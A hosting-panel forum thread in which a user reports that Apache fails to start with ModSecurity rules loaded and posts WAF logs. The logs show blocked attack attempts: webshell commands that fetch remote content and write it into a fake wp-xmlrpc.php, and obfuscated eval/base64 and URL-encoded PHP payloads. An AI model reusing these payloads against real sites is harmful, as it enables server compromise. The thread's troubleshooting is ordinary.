Author Topic: Reloading httpd: not reloading due to configuration syntax error  (Read 931 times)

0 Members and 1 Guest are viewing this topic.

Offline
**
Hello,

got this when trying to reload....

When I restart apache it wont start again, red. To start it again I need to unninstall modsecurity.

Using:
CWPpro version: 0.9.8.238
Comodo WAF (Latest version of Comodo WAF rules with automatic updates) [CWPpro required] Installed version: 1.123
 
Last logs, can some one explain? I got hacked or the mod stopped the hacking?

Code: [Select]
[Fri May 12 19:11:58.407275 2017] [:error] [pid 29061:tid 139971778234112] [client 185.112.248.116:52241] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "file_put_contents" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/23_PHP_PHPGen.conf"] [line "36"] [id "218410"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack: High-Risk PHP Function Name Found||HIDE.lv|F|2"] [data "Matched Data: file_put_contents found within ARGS:cmd: file_put_contents(getcwd().'/wp-xmlrpc.php', rawurldecode(file_get_contents('[url]')));"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXezlDo8LAAAHGFzMAAAAEX"]
[Fri May 12 19:11:58.751947 2017] [:error] [pid 21357:tid 139971809703680] [client 185.112.248.116:52270] [client 185.112.248.116] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXezlDo8LAAAFNtFigAAACU"]
[Fri May 12 19:11:58.753323 2017] [:error] [pid 21357:tid 139971809703680] [client 185.112.248.116:52270] [client 185.112.248.116] ModSecurity: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/13_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||HIDE.lv|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXezlDo8LAAAFNtFigAAACU"]
[Fri May 12 19:11:59.439610 2017] [:error] [pid 21357:tid 139971967051520] [client 185.112.248.116:52292] [client 185.112.248.116] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXez1Do8LAAAFNtFikAAACF"]
[Fri May 12 19:11:59.440990 2017] [:error] [pid 21357:tid 139971967051520] [client 185.112.248.116:52292] [client 185.112.248.116] ModSecurity: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/13_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||HIDE.lv|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/wp-xmlrpc.php"] [unique_id "WRXez1Do8LAAAFNtFikAAACF"]
[Fri May 12 19:12:00.061573 2017] [:error] [pid 21301:tid 139971788723968] [client 185.112.248.116:52329] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(base64_decode(\\x22igz1bmn0aw9uihnjyw4ojhbhdggpihsgicagicrmb2xkzxjzid0gyxjyyxkoktsgicagiglmicgkzglyid0gqg9wzw5kaxiojhbhdggpksb7icagicagicagd2hpbgugkgzhbhnlice9psaojgzpbgugpsbyzwfkzglykcrkaxipkskgeyagicagicagicagicakbgzpbgugpsbzdhj0b2xvd2vykcrmawxlktsgicagicagicagicagjhbmawxlid0gjhbhdggglianlycgliakzmlsztsgicagicagicagicagawygkcrmawxlice9iccujyamjiakzmlszsahpsanli4nksb7icagicagicagicagicagicbpziaoaxnfbgluaygkcgzpbgupksb7icagicagicagicagicagicagicagy29udg..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0FDo8LAAAFM1gqoAAAAW"]
[Fri May 12 19:12:00.381321 2017] [:error] [pid 21301:tid 139971977541376] [client 185.112.248.116:52359] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(rawurldecode(\\x22%20function%20scan%28%24path%29%20%7b%20%20%20%20%20%24folders%20%3d%20array%28%29%3b%20%20%20%20%20if%20%28%24dir%20%3d%20%40opendir%28%24path%29%29%20%7b%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3d%3d%20%28%24file%20%3d%20readdir%28%24dir%29%29%29%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24lfile%20%3d%20strtolower%28%24file%29%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24pfile%20%3d%20%24path%20.%20%27/%27%20.%20%24file%3b..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0FDo8LAAAFM1gqsAAAAE"]
[Fri May 12 19:12:00.990898 2017] [:error] [pid 21301:tid 139971778234112] [client 185.112.248.116:52390] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(base64_decode(\\x22igz1bmn0aw9uihnjyw4ojhbhdggpihsgicagicrmb2xkzxjzid0gyxjyyxkoktsgicagiglmicgkzglyid0gqg9wzw5kaxiojhbhdggpksb7icagicagicagd2hpbgugkgzhbhnlice9psaojgzpbgugpsbyzwfkzglykcrkaxipkskgeyagicagicagicagicakbgzpbgugpsbzdhj0b2xvd2vykcrmawxlktsgicagicagicagicagjhbmawxlid0gjhbhdggglianlycgliakzmlsztsgicagicagicagicagawygkcrmawxlice9iccujyamjiakzmlszsahpsanli4nksb7icagicagicagicagicagicbpziaoaxnfbgluaygkcgzpbgupksb7icagicagicagicagicagicagicagy29udg..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0FDo8LAAAFM1gqwAAAAX"]
[Fri May 12 19:12:01.348794 2017] [:error] [pid 21301:tid 139971893622528] [client 185.112.248.116:52426] [client 185.112.248.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:alert|eval|fromcharcode)\\\\s*(?:\\\\(|`)" at ARGS:cmd. [file "/usr/local/apache/modsecurity-cwaf/rules/08_XSS_XSS.conf"] [line "229"] [id "212790"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||HIDE.lv|F|2"] [data "Matched Data: eval( found within ARGS:cmd: eval(eval(rawurldecode(\\x22%20function%20scan%28%24path%29%20%7b%20%20%20%20%20%24folders%20%3d%20array%28%29%3b%20%20%20%20%20if%20%28%24dir%20%3d%20%40opendir%28%24path%29%29%20%7b%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3d%3d%20%28%24file%20%3d%20readdir%28%24dir%29%29%29%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24lfile%20%3d%20strtolower%28%24file%29%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24pfile%20%3d%20%24path%20.%20%27/%27%20.%20%24file%3b..."] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "HIDE.lv"] [uri "/wp-content/uploads/catalog_enquiry/css.php"] [unique_id "WRXe0VDo8LAAAFM1gq0AAAAM"]
[Fri May 12 21:29:39.619097 2017] [:error] [pid 21301:tid 139971767744256] [client 172.68.10.236:17343] [client 172.68.10.236] ModSecurity: Access denied with code 403 (phase 2). Matched phrase ".sql/" at TX:extension. [file "/usr/local/apache/modsecurity-cwaf/rules/11_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "3"] [msg "COMODO WAF: URL file extension is restricted by policy||HIDE.lv|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "HIDE.lv"] [uri "/jghiwiqmaskdkdw.sql"] [unique_id "WRX-E1Do8LAAAFM1gswAAAAY"]
[Sat May 13 02:47:39.994558 2017] [:error] [pid 21329:tid 139971914602240] [client 141.101.104.69:31861] [client 141.101.104.69] ModSecurity: Access denied with code 403 (phase 2). Matched phrase ".sql/" at TX:extension. [file "/usr/local/apache/modsecurity-cwaf/rules/11_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "3"] [msg "COMODO WAF: URL file extension is restricted by policy||HIDE.store|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "HIDE.store"] [uri "/jghiwiqmaskdkdw.sql"] [unique_id "WRZJm1Do8LAAAFNRZ4gAAABK"]
[Sat May 13 03:11:59.476347 2017] [:error] [pid 21519:tid 139971893622528] [client 172.68.65.136:20127] [client 172.68.65.136] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.113.186.110 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZPT1Do8LAAAFQPCFgAAADM"]
[Sat May 13 03:19:10.869683 2017] [:error] [pid 21301:tid 139972058699520] [client 197.234.242.68:15736] [client 197.234.242.68] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 41.193.5.44 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZQ-lDo8LAAAFM1g6MAAAAD"]
[Sat May 13 03:28:07.788346 2017] [:error] [pid 21329:tid 139971956561664] [client 162.158.78.134:33282] [client 162.158.78.134] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.209.58.75 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZTF1Do8LAAAFNRZ7MAAABG"]
[Sat May 13 03:28:23.621291 2017] [:error] [pid 21519:tid 139971788723968] [client 173.245.50.112:14704] [client 173.245.50.112] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 172.245.60.50 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZTJ1Do8LAAAFQPCHIAAADW"]
[Sat May 13 03:28:31.290657 2017] [:error] [pid 21519:tid 139971799213824] [client 141.101.88.158:28616] [client 141.101.88.158] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.251.182.103 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZTL1Do8LAAAFQPCHMAAADV"]
[Sat May 13 03:35:00.660806 2017] [:error] [pid 21519:tid 139971778234112] [client 141.101.105.106:34364] [client 141.101.105.106] ModSecurity: Access denied with code 403 (phase 2). Matched phrase ".sql/" at TX:extension. [file "/usr/local/apache/modsecurity-cwaf/rules/11_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "3"] [msg "COMODO WAF: URL file extension is restricted by policy||HIDE.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "HIDE.com"] [uri "/jghiwiqmaskdkdw.sql"] [unique_id "WRZUtFDo8LAAAFQPCHcAAADX"]
[Sat May 13 03:39:07.182053 2017] [:error] [pid 21329:tid 139971967051520] [client 141.101.84.170:12332] [client 141.101.84.170] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.154.155.74 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZVq1Do8LAAAFNRZ7kAAABF"]
[Sat May 13 03:49:00.097854 2017] [:error] [pid 29061:tid 139971820193536] [client 108.162.241.164:36239] [client 108.162.241.164] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 108.162.241.164 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZX-FDo8LAAAHGFzdoAAAET"]
[Sat May 13 03:57:56.392645 2017] [:error] [pid 21329:tid 139971788723968] [client 172.68.65.172:24358] [client 172.68.65.172] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/32_Apps_OtherApps.conf"] [line "1229"] [id "240335"] [rev "4"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 172.68.65.172 (+1 hits since last alert)|www.HIDE.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.HIDE.com"] [uri "/xmlrpc.php"] [unique_id "WRZaFFDo8LAAAFNRZ78AAABW"]

Offline
**
Re: Reloading httpd: not reloading due to configuration syntax error
« Reply #1 on: May 19, 2017, 06:23:48 AM »
Anyone?

How can I see who and when and why the services - apache, clamav, clamd, amavis, spamassassin was stoped???

Opened cwp and these proceses were stoped today.


Offline
*
Re: Reloading httpd: not reloading due to configuration syntax error
« Reply #2 on: May 19, 2017, 08:07:28 AM »
for issue with services going down you need to check /var/log/messages log file as this could be memory usage issue.
Regarding modsecurity not working you need to send info about what you get from apache when it doesn't want to start.

Code: [Select]
service httpd status
AntiDDoS Protection (web + mail)
http://centos-webpanel.com/website-ddos-protection-proxy

Join our Development Team and get paid !
http://centos-webpanel.com/develope-modules-for-cwp


Services Monitoring & RBL Monitoring
http://centos-webpanel.com/services-monitor


Do you need Fast and FREE Support included for your CWP linux server?
http://centos-webpanel.com/noc-partner-list
Installation Instructions
http://centos-webpanel.com/installation-instructions
Get Fast Support Here
http://centos-webpanel.com/support-services

Offline
**
Re: Reloading httpd: not reloading due to configuration syntax error
« Reply #3 on: May 22, 2017, 06:03:23 AM »
At mod section 1.Reload
Reloading httpd: not reloading due to configuration syntax error
[FAILED]

2.Restart
Stopping httpd: [  OK  ]
Starting httpd: [FAILED]

At start page Apache Webserver   red, pressing start get this:
Starting httpd: [Mon May 22 08:58:10.648062 2017] [so:warn] [pid 20534:tid 139965172991744] AH01574: module suphp_module is already loaded, skipping
[Mon May 22 08:58:10.919326 2017] [alias:warn] [pid 20534:tid 139965172991744] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 2 will probably never match because it overlaps an earlier Alias.
[Mon May 22 08:58:10.919347 2017] [alias:warn] [pid 20534:tid 139965172991744] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 3 will probably never match because it overlaps an earlier Alias.
[Mon May 22 08:58:10.919354 2017] [alias:warn] [pid 20534:tid 139965172991744] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 4 will probably never match because it overlaps an earlier Alias.
AH00526: Syntax error on line 22 of /usr/local/apache/modsecurity-cwaf/rules/00_Init_Initialization.conf:
ModSecurity: Found another rule with the same id
[FAILED]

Next, uninstall mod and everything is ok, but runing without....  :o

Offline
**
Re: Reloading httpd: not reloading due to configuration syntax error
« Reply #4 on: May 24, 2017, 06:23:13 AM »
Some help here?  :(
Code: [Select]
Stopping httpd: [  OK  ]
Starting httpd: [Wed May 24 09:17:42.106818 2017] [so:warn] [pid 14805:tid 140109236320000] AH01574: module suphp_module is already loaded, skipping
AH00548: NameVirtualHost has no effect and will be removed in the next release /usr/local/apache/conf.d/ssl.conf:9
[Wed May 24 09:17:42.377093 2017] [alias:warn] [pid 14805:tid 140109236320000] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 2 will probably never match because it overlaps an earlier Alias.
[Wed May 24 09:17:42.377107 2017] [alias:warn] [pid 14805:tid 140109236320000] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 3 will probably never match because it overlaps an earlier Alias.
[Wed May 24 09:17:42.377113 2017] [alias:warn] [pid 14805:tid 140109236320000] AH00671: The Alias directive in /usr/local/apache/conf.d/domain-redirects.conf at line 4 will probably never match because it overlaps an earlier Alias.
AH00526: Syntax error on line 22 of /usr/local/apache/modsecurity-cwaf/rules/00_Init_Initialization.conf:
ModSecurity: Found another rule with the same id
[FAILED]

Offline
**
Re: Reloading httpd: not reloading due to configuration syntax error
« Reply #5 on: May 24, 2017, 07:47:03 AM »
Fixed the above